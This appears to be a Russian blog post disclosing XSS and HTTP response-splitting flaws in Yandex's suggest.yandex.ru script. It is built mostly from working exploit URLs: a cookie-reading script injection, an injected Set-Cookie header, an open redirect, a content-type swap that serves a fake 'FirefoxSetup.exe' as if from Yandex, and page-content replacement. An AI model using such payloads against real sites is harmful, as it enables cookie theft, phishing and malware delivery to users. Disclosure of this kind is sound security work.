В сервисе поисковых подсказок Яндекса обнаружены множественные уязвимости

image

Теги: Яндекс, уязвимость

В suggest.yandex.ru найдены множественные уязвимости.

* Тип уязвимости: Межсайтовое выполнение сценариев (Cross-site Scripting, XSS). Недостаточная фильтрация содержимого переменной.

Приложение: /suggest-ya.cgi

GET-переменные: part

Пример: http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html&part=<script>alert(document.cookie)</script>


* Тип уязвимости: Расщепление HTTP-запроса (HTTP Response Splitting)

Приложение: /suggest-ya.cgi

GET-переменные: ct

Пример: ttp://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aSet-cookie:Fuzzing=fuzzing.ru%0d%0a%0d%0a&part=fuzzing.ru (устанавливает cookie от имени сервера)


Простые примеры применения, не говоря уже о сложных вариантах.


* Универсальный редиректор - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html%0d%0aLocation:%20http://fuzzing.ru/%0d%0a%0d%0a&part=fuzzing.ru


* Использование уязвимостей других приложений или распостранение вирусов (подмена content-type)


Можно предложить, к примеру, скачать с Яндекса великолепную программу Firefox с поиском Яндекса

http://suggest.yandex.ru/suggest-ya.cgi?ct=application/x-msdos-program%0d%0aLocation:%20http://fuzzing.ru/blog/files/FirefoxSetup.exe%0d%0a%0d%0a&part=fuzzing.ru

Или любое другое приложение или мультимедиа-файл. К примеру.

http://suggest.yandex.ru/suggest-ya.cgi?ct=audio/mp3%0d%0aLocation:%20http://fuzzing.ru/blog/files/somedata.mp3%0d%0a%0d%0a&part=fuzzing.ru


* Подмена содержимого страницы - http://suggest.yandex.ru/suggest-ya.cgi?ct=text/html;charset=utf-8%0d%0a%0d%0a%D0%91%D0%BB%D0%BE%D0%B3%20fuzzing.ru<script>//&part=fuzzing.ru